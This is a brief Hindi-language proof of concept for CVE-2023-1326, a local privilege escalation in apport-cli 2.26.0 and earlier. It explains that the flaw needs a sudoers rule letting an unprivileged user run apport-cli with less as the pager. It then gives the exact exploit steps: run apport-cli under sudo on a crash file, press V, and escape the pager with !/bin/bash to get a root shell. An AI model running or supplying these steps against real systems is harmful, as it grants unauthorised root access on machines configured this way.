
यह CVE-2023-1326 भेद्यता का अपना और बुनियादी प्रूफ ऑफ कॉन्सेप्ट है।
apport-cli 2.26.0 में CVE-2023–1326 के लिए एक प्रूफ ऑफ कॉन्सेप्ट
यह भेद्यता apport-cli 2.26.0 में विशेषाधिकार वृद्धि है, CVE-2023–26604 के समान, यह भेद्यता केवल तभी काम करती है यदि sudoers में असाइन किया गया हो:

apport-cli 2.26.0 और इससे पहले के संस्करणों में एक विशेषाधिकार वृद्धि हमला पाया गया जो CVE-2023-26604 के समान है। यदि किसी सिस्टम को विशेष रूप से कॉन्फ़िगर किया गया है ताकि अविशेषित उपयोगकर्ता sudo apport-cli चला सकें, less को पेजर के रूप में कॉन्फ़िगर किया गया है, और टर्मिनल का आकार सेट किया जा सकता है: एक स्थानीय हमलावर विशेषाधिकार बढ़ा सकता है।
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
